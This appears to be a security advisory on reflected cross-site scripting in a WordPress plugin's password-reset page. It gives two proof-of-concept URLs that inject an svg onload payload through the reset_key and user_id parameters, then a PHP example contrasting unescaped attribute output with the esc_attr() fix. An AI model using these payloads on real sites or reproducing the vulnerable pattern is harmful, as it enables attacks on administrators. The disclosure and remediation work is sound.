The plugin does not sanitise and escape the reset_key and user_id parameters before outputting them back into HTML attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators. Both payloads below close the attribute with `">` and inject an element that executes on load; a victim only has to open the crafted link while logged in.
https://example.com/dashboard/retrieve-password/?reset_key="><svg onload=prompt(/XSS/)>&user_id=dd
https://example.com/dashboard/retrieve-password/?reset_key=a&user_id="><svg onload=prompt(/XSS/)>
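The following is an added illustration, not the plugin's own code: it reproduces the class of bug described above (a query parameter echoed into an attribute value without escaping) next to the standard WordPress fix, using the first PoC payload as input. The function names, the hidden-field markup and the query array are assumptions made for the example; the only WordPress API used is esc_attr(), with a fallback so the script also runs under plain `php` on the command line.

```php
<?php
// Illustrative only: NOT the vulnerable plugin's code. Shows the unescaped
// attribute output pattern from the advisory and the esc_attr() fix.
// Function names and markup are assumptions made for this example.

// Fallback so the script runs outside WordPress; inside WordPress the real
// esc_attr() from wp-includes/formatting.php is used instead.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: request parameters concatenated straight into
// value="..." attributes, so a leading "> closes the attribute and the
// tag, and whatever follows becomes new markup.
function render_reset_form_vulnerable(array $query): string {
    $reset_key = $query['reset_key'] ?? '';
    $user_id   = $query['user_id'] ?? '';
    return '<input type="hidden" name="reset_key" value="' . $reset_key . '">' . "\n"
         . '<input type="hidden" name="user_id" value="' . $user_id . '">';
}

// Fixed pattern: every value that lands inside an attribute goes through
// esc_attr(), which encodes " ' < > & so the payload stays inside the quotes.
function render_reset_form_fixed(array $query): string {
    $reset_key = esc_attr($query['reset_key'] ?? '');
    $user_id   = esc_attr($query['user_id'] ?? '');
    return '<input type="hidden" name="reset_key" value="' . $reset_key . '">' . "\n"
         . '<input type="hidden" name="user_id" value="' . $user_id . '">';
}

// Constructed input: the first PoC payload, as PHP sees it after URL decoding.
$poc = [
    'reset_key' => '"><svg onload=prompt(/XSS/)>',
    'user_id'   => 'dd',
];

echo "--- vulnerable ---\n", render_reset_form_vulnerable($poc), "\n";
// The attribute is terminated early and a live <svg onload=...> element
// is emitted after the broken <input> tag.

echo "--- fixed ---\n", render_reset_form_fixed($poc), "\n";
// The payload is rendered as &quot;&gt;&lt;svg ... inside value="...",
// so the browser treats it as literal text.
```

Escaping on output is the required fix; validating on input (for example casting user_id with absint() and passing reset_key through sanitize_text_field()) is a sensible second layer but does not replace esc_attr() at the point where the value is written into the attribute.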